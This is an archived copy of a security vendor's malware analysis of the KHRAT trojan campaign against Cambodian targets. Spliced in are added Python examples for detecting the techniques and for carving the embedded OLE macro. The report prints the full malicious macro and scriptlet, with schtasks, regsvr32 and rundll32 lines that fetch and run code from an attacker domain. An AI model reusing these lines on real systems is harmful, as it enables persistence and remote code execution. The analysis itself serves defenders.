{
	"id": "77501a48-18ee-434b-a565-249cae0f0890",
	"created_at": "2026-04-06T01:32:28.91721Z",
	"updated_at": "2026-04-10T03:31:13.773225Z",
	"deleted_at": null,
	"sha1_hash": "5a994e6e9519a4d391aeda64d54bd6dbaae4d0e6",
	"title": "Updated KHRAT Malware Used in Cambodia Attacks",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1281536,
	"plain_text": "Updated KHRAT Malware Used in Cambodia Attacks\r\nBy Alex Hinchliffe, Jen Miller-Osborn\r\nPublished: 2017-08-31 · Archived: 2026-04-06 00:46:57 UTC\r\nIntroduction\r\nUnit 42 recently observed activity involving the Remote Access Trojan KHRAT used by threat actors to target the citizens of Cambodia.\r\nSo called because the Command and Control (C2) infrastructure from previous variants of the malware was located in Cambodia, as discussed by Roland Dela Paz at Forcepoint, KHRAT is a Trojan that registers victims using their infected machine’s username, system language and local IP address. KHRAT provides the threat actors typical RAT features and access to the victim system, including keylogging, screenshot capture, remote shell access and so on.\r\nThis report, covering contemporary variants of KHRAT, discusses updated techniques and a recent attack affecting Cambodians, including:\r\nUpdated spear phishing techniques and themes;\r\nMultiple techniques to download and execute additional payloads using built-in Windows applications;\r\nExpanded infrastructure mimicking the name of the well-known cloud-based file hosting service, Dropbox;\r\nCompromised Cambodian government servers.\r\nIn its various forms, including document files, executables and dynamic link libraries, KHRAT is not very prevalent, with just over fifty network sessions seen across our sensors since the start of the year and a slight uptick visible in the last couple of months.\r\nAttack Delivery\r\nOn June 21, 2017, a Word document was uploaded to WildFire, determined to be malicious and visible in AutoFocus with some interesting malicious behavior tags, namely AppLockerBypass, CreateScheduledTask and RunDLL32_JavaScript_Execution, a private tag contributed by Squadra Solutions. 
There were also some indications this file was related to the actors using KHRAT malware.\r\nThe weaponized document (SHA256: c51fab0fc5bfdee1d4e34efcc1eaf4c7898f65176fd31fd8479c916fa0bcc7cc), with the filename “Mission Announcement Letter for MIWRMP phase 3 implementation support mission, June 26-30, 2017(update).doc”, was shown in AutoFocus as contacting a Russian IP address 194.87.94[.]61 over port 80 in the form of an HTTP GET request to update.upload-dropbox[.]com – a site that could (erroneously) be thought of as belonging to the well-known cloud-based file hosting service, Dropbox, and as such is intended to trick victims and network defenders into thinking, at least at first glance, that the C2 traffic is legitimate.\r\nhttps://unit42.paloaltonetworks.com/unit42-updated-khrat-malware-used-in-cambodia-attacks/\r\nPage 1 of 20\r\nThe acronym MIWRMP refers to the Mekong Integrated Water Resources Management Project – a multi-million dollar, World Bank funded project relating to effective water resource and fisheries management in North Eastern Cambodia, which happens to be in its third phase – matching the document’s filename. Again, the attackers took steps to make the malware appear to be a legitimate file.\r\nFigure 1 below shows the document, together with the social engineering techniques employed to lead the victim into enabling the macro content and running the VBA code. 
For all intents and purposes this is a Word document, especially considering the file extension; underneath, however, it is a multipart MIME file that could also be treated as XML.\r\nSuch files are often created when saving Microsoft Office content as MHTML (MIME HTML) files – a web page archive format used to combine in a single document the HTML code and its companion resource objects – or when sending HTML messages using very old versions of Outlook, but this is by no means a new technique. For more details about this format, which includes the OLE document and its macros in a zlib-compressed, base64-encoded data part, please refer to the appendix further down.\r\nFigure 1: Weaponized Word document referring to MIWRMP phase 3\r\nOnce Word has rendered the document, and the macro content has been enabled, the VBA code, which exists as part of the “Open” macro (Document_Open), will run automatically.\r\nImmediately the victim would see the document contents change to display, simply, \"Because your Office version isn't compatible with the document, it can't be opened, according to the prompts to open the compatibility mode and then you can continue to view the document.\", as shown in Figure 2 below.\r\nFigure 2: Word document contents post VBA macro execution\r\nThis is perhaps a distraction technique, making the victim believe there truly is a compatibility issue, which is plausible given that nothing untoward visibly happens elsewhere on the system.\r\nThe VBA code from the document’s macro, shown in Figure 3 below, describes the malicious behavior. 
The first oShell.Run call in the code creates a new scheduled task using the command-line program schtasks.exe (CreateScheduledTask) together with the associated parameters, including rundll32.exe and JavaScript parameters (RunDLL32_JavaScript_Execution), which is a known method for tricking rundll32.exe into loading the mshtml.dll library, calling the exported function RunHTMLApplication, and having it execute the subsequent JavaScript code. We will cover this in more detail later on.\r\nThe AutoFocus tag CreateScheduledTask indicates that a given application, irrespective of malicious classification, is capable of creating tasks for the Windows scheduler to execute. This is often used by malware for maintaining persistence or, in some cases, to aid spreading throughout a network by using remote hosts’ schedulers to execute payloads. Since the start of this year this behavior has been seen very consistently during dynamic analysis of malware, averaging over three thousand malicious sessions per day containing malware using this technique, and spiking towards the end of July, as per the sparkline chart above, to between twenty and forty thousand sessions each day in one week.\r\nThroughout the year the number of malware samples exhibiting the behavior relating to the RunDLL32_JavaScript_Execution AutoFocus tag has been much, much smaller compared to CreateScheduledTask. 
Averaging about one malicious session per day – in reality small groups of samples in the same day or week, spread over the year – this technique was last seen around the date of the KHRAT activity discussed in this report.\r\nAs mentioned previously, AutoFocus also tagged the document file as exhibiting a malicious behavior named “AppLockerBypass”, which relates to a technique discovered last year, whereby regsvr32.exe – a command-line tool that registers DLL files as COM components in the Windows registry – can download and execute scripts within XML files hosted at URLs. This technique works on many versions of the Windows operating system and, because regsvr32.exe is an allowlisted, trusted binary on Windows, it can be used to download and execute programs that would otherwise be prevented by AppLocker policies or rules. The second oShell.Run call in the code performs this activity.\r\nThe AppLockerBypass tag has been seen slightly more frequently than RunDLL32_JavaScript_Execution but also dropped off completely in the last couple of months.\r\nPrivate Sub Document_Open()\r\nDim oShell, office_text As String\r\nOn Error Resume Next\r\nSet oShell = CreateObject(\"WSCript.shell\")\r\noShell.Run \"schtasks /create /sc MINUTE /tn \"\"fuck you\"\" /tr \" \u0026 _\r\n           \"\"\"rundll32 javascript:\\\"\"\\..\\mshtml,RunHTMLApplication \\\"\";document.write();try{GetObject(\\\"\"script:http://update.upload-dropbox[.]com/images/rtf/logo33_bak.ico\\\"\");}catch(e){};window.close()\"\"\" \u0026 _\r\n           \" /mo 10 /F\"\"\", 0\r\noShell.Run \"regs\" \u0026 _\r\n           \"vr32.exe /s /n /u /i:http://update.upload-dropbox[.]com/images/rtf/logo33.ico scro\" \u0026 _\r\n           \"bj.dll\", 0\r\nSet oShell = Nothing\r\noffice_text = \"Because your Office version isn't compatible with the document, it can't be opened, according to the prompts to open the compatibility mode and then you can continue to view the document.\"\r\nActiveDocument.Range.Text = office_text\r\nEnd Sub\r\nFigure 3: VBA Macro code from the weaponised document\r\nAt the time of writing the logo33_bak.ico and logo33.ico files referenced in the VBA macro code were unavailable, and their exact contents and purpose are not known; however, judging by other .ico files downloaded in similar ways by related components of KHRAT malware, it is fair to assume they would include methods to add further persistence to the actor’s attack, or install further payloads towards their objectives.\r\nDuring dynamic analysis of this malicious document, and downloaded payloads, in our WildFire sandbox, modifications were also made to the Windows registry. Specifically, the MRU (Most Recently Used) list of documents opened using Microsoft Word was updated such that all items referenced each of the filenames listed below. This would mean that should the victim load any document from their most recently used document list, Word would open the malicious document again.\r\nQQYXDK0tQH.docm\r\nMGm.docx\r\n9sxAwWnA.docm\r\n8Y0kVy.doc\r\nW4.docm\r\noDF.docx\r\nMk3tj.doc\r\n77ajEQp0fn.docx\r\neSjo0J.doc\r\nbp8OB7.docx\r\nY.docx\r\npjuhm0HWeKE.doc\r\nWktDOjyzu.docm\r\nThe registry key modified is shown below, where \u003cversion\u003e would relate to the version of Office installed, e.g. 14.0, and \u003cnumber\u003e would relate to the position in the most recent document list. 
In the case of KHRAT the first 14 MRU items were updated:\r\nHKCU\\Software\\Microsoft\\Office\\\u003cversion\u003e\\Word\\File MRU\\Item \u003cnumber\u003e\r\nFake “Dropbox” Infrastructure\r\nPivoting on the data points discussed thus far, such as the domain name update.upload-dropbox[.]com, the Russian IP address, or indeed the registrant email address for the domain – the misspelt mail.noreoly@gmail[.]com – provides an insight into the initial infrastructure supporting this campaign. Figure 4 below shows this infrastructure with some key points numbered.\r\nSample (1) relates to the document, described earlier in this report, and shows the connection to the domain update.upload-dropbox[.]com, also previously discussed, as well as to the Russian IP address 194.87.94[.]61. Figure 4 also shows another sample (2) connecting to the update.upload-dropbox[.]com domain, and having been hosted on the compromised Cambodian Government website, redacted in the figure.\r\nFigure 4: Initial infrastructure relating to fake Dropbox sites\r\nAdditional research into upload-dropbox[.]com uncovered samples beaconing to third-level subdomains of both it and inter-ctrip[.]com, as well as passive DNS (PDNS) overlaps between multiple third-level subdomains of each domain. inter-ctrip[.]com has previously been reported as a C2 related to this activity. As with the fake Dropbox domain intended to trick victims and defenders by closely mimicking a legitimate website, the actor-registered inter-ctrip[.]com is very similar to two legitimate travel websites, ctrip.com and intertrips.com. 
Ctrip is a China-based travel provider, while\r\nInterTrips is a US-based travel provider focusing on travel to Asia. While researching the infrastructure we also\r\nfound an additional malicious domain not previously reported, vip53[.]cn. As with the aforementioned two\r\ndomains, it is actor-registered and has multiple third level domains being used as C2s.\r\nAll of the IPs to which these C2 domains resolved, when it was possible to identify the owner, are tied to either\r\nVPS providers or legitimate but compromised infrastructure. In two cases we were able to identify what appear to\r\nbe compromised wireless devices, with one in Vietnam and one in Singapore.\r\nInstallation \u0026 Persistence\r\nKHRAT Dropper\r\nSample (2) (SHA256:53e27fd13f26462a58fa5587ecd244cab4da23aa80cf0ed6eb5ee9f9de2688c1) is a very small\r\n– 2,560 byte – Portable Executable (PE) file hosted on the compromised government servers, and downloaded in\r\nweb-browsing sessions by organizations based in Cambodia. According to AutoFocus, these sessions indicated the\r\nEXE filename was either ‘news’ or ‘logo’ and, in both cases, the extension was ‘.jpg’.\r\nThe Microsoft Visual C++ compiled program ‘news.jpg’ simply calls the WinExec Windows API to launch\r\nanother application – regsvr32.exe – passing the parameters shown in Figure 5 below, before exiting. As you can\r\nimagine, such activity is tagged in AutoFocus, just like the document sample exhibiting the same behavior, as\r\n“AppLockerBypass”.\r\nFigure 5: news.jpg code to execute regsvr32.exe with malicious XML/VBS script.\r\nThis variant of KHRAT runs regsvr32.exe using the ‘/I’ option to pass a command line – the URL in this case – as\r\na parameter when registering scrobj.dll – Microsoft's Script Component Runtime.  Regsvr32.exe will download\r\nlogo.ico – an XML registration script – from update.upload-dropbox[.]com. 
The contents of logo.ico include a VBS script to harvest a list of running processes from the system using Windows Management Instrumentation (WMI). This list is then sent as an HTTP POST to the PHP script http://update.upload-dropbox[.]com/docs/tz/GetProcess.php. At the time of writing, this POST received no response from the server and may have been simply for further reconnaissance and information gathering, or to provide further payloads. For more information about this logo.ico, please see the “Reconnaissance” appendix.\r\nAnother component related to the campaign is sample (4) (SHA256: c0baa57cbb66b8a86aac7d4eeab7a0dc1ecfb528d8e92a45bdb987d1cd5cb9b2) shown in Figure 4 above. This PE executable attempts to download http://update.upload-dropbox[.]com/images/flash/index.ico, which is shown in Figure 6 below, highlighting the actors’ consistent use of techniques to remain persistent and download further malicious components.\r\n\u003c?XML version=\"1.0\"?\u003e\r\n\u003cscriptlet\u003e\r\n\u003cregistration progid=\"ff010f\" classid=\"{e934870c-b429-4d0d-acf1-eef338b92c4b}\" \u003e\r\n\u003cscript language=\"vbscript\"\u003e\r\n\u003c![CDATA[\r\nCreateObject(\"WScript.Shell\").Run \"schtasks /create /sc MINUTE /tn \"\"Windows Scheduled Maintenance1\"\" /tr \"\"\\\"\"regsvr32.exe\\\"\" /s /n /u /i:http://update.upload-dropbox[.]com/images/flash/reg.ico scrobj.dll\"\" /mo 4 /F\"\"\"\r\nCreateObject(\"WScript.Shell\").Run \"schtasks /create /sc MINUTE /tn \"\"Windows Scheduled Maintenance2\"\" /tr \"\"\\\"\"regsvr32.exe\\\"\" /s /n /u /i:http://update.upload-dropbox[.]com/images/flash/reg_salt.ico scrobj.dll\"\" /mo 20 /F\"\"\"\r\nCreateObject(\"WScript.Shell\").Run \"schtasks /create /sc MINUTE /tn \"\"Windows Scheduled Maintenance3\"\" /tr \"\"\\\"\"regsvr32.exe\\\"\" /s /n /u /i:http://update.upload-dropbox[.]com/images/flash/reg_bak.ico scrobj.dll\"\" /mo 10 /F\"\"\"\r\nCreateObject(\"WScript.Shell\").Run \"rundll32.exe javascript:\"\"\\..\\mshtml,RunHTMLApplication \"\";document.write();try{GetObject(\"\"script:http://update.upload-dropbox[.]com/images/flash/run.ico\"\");}catch(e){};window.close()\"\r\n]]\u003e\r\n\u003c/script\u003e\r\n\u003c/registration\u003e\r\n\u003c/scriptlet\u003e\r\nFigure 6: index.ico downloaded by another KHRAT component\r\nindex.ico creates three scheduled tasks with the more subtly named “Windows Scheduled Maintenance1” (Maintenance2 and Maintenance3) – although three tasks with incremented numbers in their names is also a little suspicious – and uses regsvr32.exe to download and execute three other .ico files – reg.ico, reg_salt.ico and reg_bak.ico – the purposes of which are currently unknown. It is worth noting that each task has a different running frequency – every 4 minutes, 20 minutes and 10 minutes, respectively – which could indicate a dependency on reg.ico, as it is more aggressively sought after, or that it is a more critical component to have running.\r\nThe VBScript code in index.ico, shown in Figure 6, performs one final command that abuses the aforementioned rundll32.exe trick to attempt to download run.ico from http://update.upload-dropbox[.]com/images/flash. 
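The three built-in-binary tricks in Figures 3 and 6 (a schtasks /create task with a short /mo interval, regsvr32.exe /s /n /u /i:http... scrobj.dll, and rundll32.exe javascript: loading mshtml,RunHTMLApplication) each leave a distinctive process command line, which is the most practical place to detect them. The Python below is an added example, not code from the original post or from Unit 42: it classifies command lines of the kind a Sysmon event ID 1 or Windows Security event 4688 record carries, pulls the task action and repeat interval out of a schtasks /create line (including the backslash-escaped quotes the index.ico tasks use), and extracts the .Run command strings from a scriptlet so they can be classified before anything executes. The sample command lines and the sample scriptlet are constructed here to mirror the figures, keeping the page's defanged [.] domain; the technique labels are this example's own names, not AutoFocus tags.

```python
DQ = chr(34)   # double quote
BS = chr(92)   # backslash

def unplaceholder(text):
    # The constructed samples below write ~ for a double quote and ^ for a backslash
    # so the Windows quoting survives intact; real log data needs no such step.
    return text.replace('~', DQ).replace('^', BS)

def classify_command_line(cmd):
    # Labels are this example's own; they line up with the three behaviours in the post.
    c = cmd.lower()
    hits = set()
    if 'regsvr32' in c and 'scrobj.dll' in c and ('/i:http://' in c or '/i:https://' in c):
        hits.add('regsvr32_scriptlet_url')        # scrobj.dll fetching a scriptlet from a URL
    if 'rundll32' in c and 'javascript:' in c and 'mshtml' in c and 'runhtmlapplication' in c:
        hits.add('rundll32_javascript_mshtml')    # the mshtml,RunHTMLApplication trick
    if 'schtasks' in c and '/create' in c and '/tr ' in c:
        hits.add('schtasks_create')
    return hits

def schtasks_action(cmd):
    # Return the /tr (task action) value of a schtasks /create line, or None. A quoted
    # value may contain backslash-escaped quotes (the scriptlet tasks wrap regsvr32.exe
    # that way), so an escaped quote is kept and the scan stops at the first bare quote.
    i = cmd.lower().find('/tr ')
    if i < 0:
        return None
    j = i + 4
    while j < len(cmd) and cmd[j] == ' ':
        j += 1
    if j >= len(cmd):
        return None
    if cmd[j] != DQ:                                # unquoted: runs up to the next switch
        rest = cmd[j:]
        end = rest.find(' /')
        return rest if end < 0 else rest[:end]
    out, k = [], j + 1
    while k < len(cmd):
        if cmd[k] == BS and k + 1 < len(cmd) and cmd[k + 1] == DQ:
            out.append(DQ)
            k += 2
            continue
        if cmd[k] == DQ:
            break
        out.append(cmd[k])
        k += 1
    return ''.join(out)

def schtasks_interval_minutes(cmd):
    # For /sc MINUTE tasks the /mo modifier is the repeat interval in minutes.
    toks = cmd.lower().split()
    try:
        if toks[toks.index('/sc') + 1] == 'minute':
            return int(toks[toks.index('/mo') + 1])
    except (ValueError, IndexError):
        pass
    return None

def analyze(cmd):
    techniques = classify_command_line(cmd)
    action = schtasks_action(cmd) if 'schtasks_create' in techniques else None
    return {'techniques': sorted(techniques), 'action': action,
            'interval_minutes': schtasks_interval_minutes(cmd) if action else None}

def scriptlet_commands(scriptlet_text):
    # Parser-free extraction of the string literal passed to each .Run call in a
    # scriptlet's VBScript; a doubled quote inside a VBScript literal is one quote.
    cmds = []
    for chunk in scriptlet_text.split('.Run ')[1:]:
        if not chunk.startswith(DQ):
            continue
        out, k = [], 1
        while k < len(chunk):
            if chunk[k] == DQ:
                if k + 1 < len(chunk) and chunk[k + 1] == DQ:
                    out.append(DQ)
                    k += 2
                    continue
                break
            out.append(chunk[k])
            k += 1
        cmds.append(''.join(out))
    return cmds

# Constructed samples mirroring the command lines in Figures 3 and 6 (not captured telemetry).
SAMPLE_COMMAND_LINES = {
    'vba_schtasks': unplaceholder(
        'schtasks /create /sc MINUTE /tn ~fuck you~ /tr ~rundll32 javascript:^~^..^mshtml,'
        'RunHTMLApplication ^~;document.write();try{GetObject(^~script:http://update.upload-dropbox[.]com'
        '/images/rtf/logo33_bak.ico^~);}catch(e){};window.close()~ /mo 10 /F~'),
    'vba_regsvr32': 'regsvr32.exe /s /n /u /i:http://update.upload-dropbox[.]com/images/rtf/logo33.ico scrobj.dll',
    'benign_schtasks': unplaceholder('schtasks /create /sc DAILY /tn ~Nightly Backup~ /tr ~C:^Tools^backup.exe /full~ /st 02:00'),
    'benign_regsvr32': unplaceholder('regsvr32.exe /s C:^Program Files^Vendor^vendor.dll'),
}

SAMPLE_SCRIPTLET = unplaceholder('''<?XML version=~1.0~?>
<scriptlet>
<registration progid=~ff010f~ classid=~{e934870c-b429-4d0d-acf1-eef338b92c4b}~ >
<script language=~vbscript~>
<![CDATA[
CreateObject(~WScript.Shell~).Run ~schtasks /create /sc MINUTE /tn ~~Windows Scheduled Maintenance1~~ /tr ~~^~~regsvr32.exe^~~ /s /n /u /i:http://update.upload-dropbox[.]com/images/flash/reg.ico scrobj.dll~~ /mo 4 /F~~~
CreateObject(~WScript.Shell~).Run ~schtasks /create /sc MINUTE /tn ~~Windows Scheduled Maintenance2~~ /tr ~~^~~regsvr32.exe^~~ /s /n /u /i:http://update.upload-dropbox[.]com/images/flash/reg_salt.ico scrobj.dll~~ /mo 20 /F~~~
CreateObject(~WScript.Shell~).Run ~schtasks /create /sc MINUTE /tn ~~Windows Scheduled Maintenance3~~ /tr ~~^~~regsvr32.exe^~~ /s /n /u /i:http://update.upload-dropbox[.]com/images/flash/reg_bak.ico scrobj.dll~~ /mo 10 /F~~~
CreateObject(~WScript.Shell~).Run ~rundll32.exe javascript:~~^..^mshtml,RunHTMLApplication ~~;document.write();try{GetObject(~~script:http://update.upload-dropbox[.]com/images/flash/run.ico~~);}catch(e){};window.close()~
]]>
</script>
</registration>
</scriptlet>
''')

if __name__ == '__main__':
    for name, line in SAMPLE_COMMAND_LINES.items():
        print(name, analyze(line))
    for cmd in scriptlet_commands(SAMPLE_SCRIPTLET):
        print('index.ico', analyze(cmd))
```

Two design points: the checks deliberately key on the combination (regsvr32 plus scrobj.dll plus a URL in /i:, rundll32 plus javascript: plus mshtml) rather than on any single token, because regsvr32.exe and rundll32.exe are routine on every host, and the macro's split string ('regs' and 'vr32.exe', 'scro' and 'bj.dll') is irrelevant here because the process creation event records the joined command line. The /mo interval is worth surfacing on its own: a task re-running a download every 4 to 20 minutes is rarely legitimate maintenance.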
Unfortunately, all four of these .ico files are unavailable at the time of writing.\r\nKHRAT DLL\r\nAt the time of writing a DLL component was not downloaded and executed, however, AutoFocus makes it clear,\r\nas shown in Figure 7, that during the Wildfire detonation of one of the droppers in June, a DLL component is\r\npresent and called using rundll32.exe (as it was intended this time) to run the DLL – WIN.DAT – passing the\r\nparameters K1 or K3 depending on the function required by the caller.\r\nFigure 7: Wildfire detonation results showing KHRAT DLL being called.\r\nFurthermore, the registry activity gathered from Wildfire indicates a persistence mechanism whereby the DLL will\r\nbe loaded via a Registry Run key, passing K1 as the parameter, as shown in Figure 8 below.\r\nFigure 8: Wildfire detonation results showing persistence mechanism using the registry\r\nAlthough no DLL sample was available at the time of writing, sample (3) (SHA256:\r\nde4ab35a2de67832298f5eb99a9b626a69d1beca78aaffb1ce62ff54b45c096a), shown in Figure 4, is a DLL that has\r\nbeen linked to the campaign and had been seen in Wildfire exhibiting behaviors as described here.\r\nChinese Developer Network click-tracker\r\nDuring investigation of the KHRAT dropper code responsible for sending process lists to http://update.upload-dropbox[.]com/docs/tz/GetProcess.php, I reviewed some of the responses and content received. Working my way\r\nfrom the root of the site backwards to the GetProcess.php script I encountered a mixture of HTTP 500 – Internal\r\nServer Error and HTTP 403 – Forbidden messages from the server, however, when browsing the root of the /tz/\r\nfolder, I noticed an interesting one-line HTML code snippet loading a JavaScript from http://doc.upload-dropbox[.]com/docs/tz/probe_sl.js.\r\nThe JavaScript code in probe_sl.js uses a click-tracking technique, presumably so the actors can monitor who is\r\nvisiting their site. 
It may also be an attempt to control the distribution of later-stage malware and tools, by only sending it in response to requests from desired victims or vulnerable systems, and dropping requests from others such as researchers. The data gathered by the code includes the user-agent, domain, cookie, referrer and Flash version, which are sent in an HTTP GET request to probe_sl.php, a PHP script located in the same folder as the JavaScript on the server.\r\nInterestingly the JavaScript code appears almost identical to that found on a blog hosted on the Chinese Software Developer Network (CSDN) website. The blog, entitled “XSS信息刺探脚本” (translation: XSS information spying script) and written by eT48_Sec, provides not only the JavaScript code to gather the tracking information but also the PHP server-side code to receive and save the information to disk. The HTML-formatted contents of the file containing the tracked information, entitled \"Sensitive Information\", would look like the example shown in Figure 9 below. 
For more information about the code used in this click-tracker, please see the “CSDN Click Tracker” appendix.\r\nFigure 9: data.html from the actor’s server, as viewed in a web-browser\r\nConclusion\r\nThe threat actors behind KHRAT have evolved the malware and their TTPs over the course of this year, in an attempt to produce more successful attacks, which in this case included targets within Cambodia.\r\nThis most recent campaign highlights social engineering techniques that reference, in great detail, nationwide activities likely to be at the forefront of people’s minds, as well as the new use of multiple Windows techniques to download and execute malicious payloads using built-in applications in order to remain inconspicuous, which is a change from earlier variants.\r\nOther notable actions by the threat actors included updated infrastructure purporting to be part of either the well-known cloud-based company, Dropbox, or a travel agency, likely to appear genuine, masquerading traffic under the premise of other applications to communicate with the attack infrastructure, some of which included compromised Cambodian Government servers. 
The attackers’ use of click-tracking software on their C2 domain lets them track both intended victims and researchers who have discovered the activity, which is not something we have found to date in use by many groups.\r\nWe believe this malware, the infrastructure being used, and the TTPs highlight a more sophisticated threat actor group, which we will continue to monitor closely and report on as necessary.\r\nPalo Alto Networks customers are protected and may learn more via the following:\r\nSamples are classified as malicious by WildFire and Traps prevents their execution.\r\nDomains and IPs have been classified as malicious and IPS signatures generated.\r\nAutoFocus users may learn more via the KHRAT tag.\r\nIndicators of Compromise\r\nKHRAT Delivery Document:\r\nc51fab0fc5bfdee1d4e34efcc1eaf4c7898f65176fd31fd8479c916fa0bcc7cc\r\nKHRAT Dropper:\r\n53e27fd13f26462a58fa5587ecd244cab4da23aa80cf0ed6eb5ee9f9de2688c1\r\nKHRAT Payload:\r\nc0baa57cbb66b8a86aac7d4eeab7a0dc1ecfb528d8e92a45bdb987d1cd5cb9b2\r\nKHRAT DLL:\r\nde4ab35a2de67832298f5eb99a9b626a69d1beca78aaffb1ce62ff54b45c096a\r\nRelated infrastructure\r\nupload-dropbox[.]com\r\nupdate.upload-dropbox[.]com\r\ndoc.upload-dropbox[.]com\r\ndate.upload-dropbox[.]com\r\nftp.upload-dropbox[.]com\r\ninter-ctrip[.]com\r\nkh.inter-ctrip[.]com\r\nbit.inter-ctrip[.]com\r\ncookie.inter-ctrip[.]com\r\nhelp.inter-ctrip[.]com\r\ndcc.inter-ctrip[.]com\r\ntravehappy.inter-ctrip[.]com\r\nonline.inter-ctrip[.]com\r\nupgrade.inter-ctrip[.]com\r\nvip53[.]cn\r\ndns.vip53[.]cn\r\nftp.vip53[.]cn\r\nmail.vip53[.]cn\r\nnc.vip53[.]cn\r\nnz.vip53[.]cn\r\nsl.vip53[.]cn\r\nsz.vip53[.]cn\r\nyk.vip53[.]cn\r\nAppendix\r\nDelivery Document\r\nAs mentioned earlier, the delivery document contained VBA code (Figure 
3) to download and install further malicious payloads using the AppLockerBypass and RunDLL32_JavaScript_Execution techniques, abusing built-in, trusted Microsoft applications.\r\nThe document, as shown in Figure 10, is a multipart MIME file created when saving Microsoft Office content as MHTML (MIME HTML) – a web page archive format used to combine in a single document the HTML code and its companion resources.\r\nFigure 10: multipart MIME Document format\r\nEmbedded files, such as the images in the document itself, are stored in the MIME file as base64-encoded data. The most interesting of all the encoded data sections, representing the original OLE document and associated VBA macros, is the one shown in Figure 11 – editdata.mso. The MSO file type is created when saving an Office document as a webpage, and the data is base64 encoded.\r\nFigure 11: MSO object containing the OLE Document and VBA macros.\r\nFigure 12 below shows the base64 content decoded to reveal the ActiveMime wrapper, which is zlib compressed, as per the magic bytes at offset 0x32. Once decompressed, the traditional OLE object and header (0xD0CF11E0), as shown in Figure 13, is revealed.\r\nFigure 12: ActiveMime ZLIB wrapper\r\nFigure 13: Decompressed data showing the OLE object.\r\nThe VBA macro code performs several functions, the first of which is to create a scheduled task, as shown in Figure 14 below. 
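Before the task is examined further, the unwrapping described in Figures 10 to 13 (and summarized in the Attack Delivery section) can be scripted. The Python below is an added example, not code from the original post: it checks that a file carrying a .doc extension is really MIME, walks the MHTML parts with the standard library email parser, finds the base64 part whose decoded payload starts with the ActiveMime signature, decompresses the zlib stream at offset 0x32 (falling back to the first zlib header if the layout differs) and verifies the OLE compound-file magic D0 CF 11 E0 A1 B1 1A E1 on the result. The sample MHTML is constructed inline around a fake OLE header so the example runs offline; the MIME boundary, the Content-Location path and the fake container contents are assumptions, not values from the real document. On a real sample the carved bytes are what you hand to an OLE/VBA parser to dump the macro.

```python
import base64
import email
import zlib
from email.policy import default

OLE_MAGIC = bytes.fromhex('d0cf11e0a1b11ae1')   # OLE2 / compound file header
ACTIVEMIME_MAGIC = b'ActiveMime'
ZLIB_OFFSET = 0x32                                # where the zlib stream starts in editdata.mso
CRLF = chr(13) + chr(10)

def looks_like_mhtml(data):
    # A genuine .doc begins with the OLE magic; an MHTML 'document' begins with MIME headers.
    head = data[:4096]
    return not head.startswith(OLE_MAGIC) and b'MIME-Version:' in head

def carve_ole_from_activemime(blob):
    # Return the decompressed OLE container from an ActiveMime wrapper, or None.
    if not blob.startswith(ACTIVEMIME_MAGIC):
        return None
    start = ZLIB_OFFSET
    if len(blob) <= start or blob[start] != 0x78:          # 0x78 opens a zlib stream
        start = blob.find(bytes([0x78, 0x9C]))              # fall back to the first zlib header
        if start < 0:
            return None
    try:
        ole = zlib.decompress(blob[start:])
    except zlib.error:
        return None
    return ole if ole.startswith(OLE_MAGIC) else None

def extract_ole_container(mhtml_bytes):
    # Walk every MIME part and return (content_location, ole_bytes) for the first part
    # that carves to an OLE container; (None, None) if nothing does.
    msg = email.message_from_bytes(mhtml_bytes, policy=default)
    for part in msg.walk():
        if part.is_multipart():
            continue
        payload = part.get_payload(decode=True) or b''
        ole = carve_ole_from_activemime(payload)
        if ole is not None:
            return part.get('Content-Location'), ole
    return None, None

def build_sample_mhtml():
    # Constructed sample, not the KHRAT document: a one-part MHTML archive whose
    # editdata.mso part holds a fake OLE container inside an ActiveMime/zlib wrapper.
    fake_ole = OLE_MAGIC + bytes(504) + b'Attribute VB_Name = ThisDocument'
    wrapper = ACTIVEMIME_MAGIC + bytes(ZLIB_OFFSET - len(ACTIVEMIME_MAGIC)) + zlib.compress(fake_ole)
    boundary = 'NextPart_01D2E3F4_5A6B7C8D'   # assumed value
    lines = [
        'MIME-Version: 1.0',
        'Content-Type: multipart/related; boundary=' + boundary,
        '',
        '--' + boundary,
        'Content-Location: file:///C:/Users/victim/AppData/Local/Temp/msohtml1/01/clip_editdata.mso',
        'Content-Transfer-Encoding: base64',
        'Content-Type: application/x-mso',
        '',
        base64.b64encode(wrapper).decode('ascii'),
        '--' + boundary + '--',
        '',
    ]
    return CRLF.join(lines).encode('ascii')

if __name__ == '__main__':
    sample = build_sample_mhtml()
    print('MHTML disguised as .doc:', looks_like_mhtml(sample))
    location, ole = extract_ole_container(sample)
    print(location, ole[:8].hex() if ole else None)
```

The extension check matters more than it looks: Word picks the parser from the content, not the extension, so a .doc that is really MHTML opens normally for the user while any tool that trusts the extension and expects an OLE file (or a ZIP for .docm) sees nothing to scan.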
The task will launch rundll32.exe every 10 minutes, indefinitely, passing similar parameters as discussed earlier to have rundll32.exe execute JavaScript code to download and execute the contents of http://update.upload-dropbox[.]com/images/rtf/logo33_bak.ico.\r\nFigure 14: Windows Task Scheduler showing the malicious task\r\nReconnaissance\r\nAfter execution, the dropper executable, as shown in Figure 5, uses the AppLockerBypass technique to download and execute the XML content shown below in Figure 15. The XML content contains VBScript code capable of enumerating all running processes and sending the resultant information to a PHP script on a remote host.\r\nAll process names enumerated are stored in a newline-delimited (Chr(13) and Chr(10)) string where each line is padded with spaces (Chr(32)). The text list is then transmitted over an HTTP POST to a PHP script hosted at the following location: http://update.upload-dropbox[.]com/docs/tz/GetProcess.php. 
